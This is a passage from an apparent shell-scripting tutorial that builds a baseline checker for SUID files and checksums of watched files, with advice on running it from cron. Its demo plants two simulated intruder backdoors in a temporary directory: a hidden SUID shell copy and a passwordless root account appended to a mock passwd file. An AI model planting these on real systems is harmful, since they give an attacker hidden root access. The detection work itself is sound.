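        sha256sum "$path"
    done
}

# snapshot ROOT CONFIG: both lists, with section markers, on stdout.
snapshot() {
    echo "## suid"
    suid_list "$1"
    echo "## checksums"
    checksum_list "$2"
}

# baseline_save ROOT CONFIG DBFILE: record the current state.
baseline_save() {
    snapshot "$1" "$2" > "$3"
}

# baseline_check ROOT CONFIG DBFILE: print "- entry" for lines that vanished
# from the baseline and "+ entry" for lines that are new. A changed file shows
# up as its old hash removed and its new hash added. No output means no change.
baseline_check() {
    snapshot "$1" "$2" | diff "$3" - | sed -n 's/^< /- /p; s/^> /+ /p'
}

# Constructed sample: one legitimate SUID helper and one watched config file.
ROOT=$(mktemp -d)
mkdir -p "$ROOT/bin" "$ROOT/etc"
printf '#!/bin/sh\necho hello\n' > "$ROOT/bin/helper"
chmod 4755 "$ROOT/bin/helper"
printf 'root:x:0:0:root:/root:/bin/sh\n' > "$ROOT/etc/passwd"
printf '%s\n' "$ROOT/etc/passwd" "$ROOT/bin/helper" > "$ROOT/watch.conf"
baseline_save "$ROOT" "$ROOT/watch.conf" "$ROOT/baseline.db"

# Simulate an intruder: a hidden SUID copy of a shell and an extra root account.
printf '#!/bin/sh\n' > "$ROOT/bin/.sh"
chmod 4755 "$ROOT/bin/.sh"
printf 'hacker::0:0::/:/bin/sh\n' >> "$ROOT/etc/passwd"
echo "Changes since the baseline:"
baseline_check "$ROOT" "$ROOT/watch.conf" "$ROOT/baseline.db"
rm -rf "$ROOT"
```

For a whole system, call baseline_save / with a configuration listing the binaries and files in /etc that should never change, run baseline_check from cron, and mail its output to the administrator only when it is non-empty.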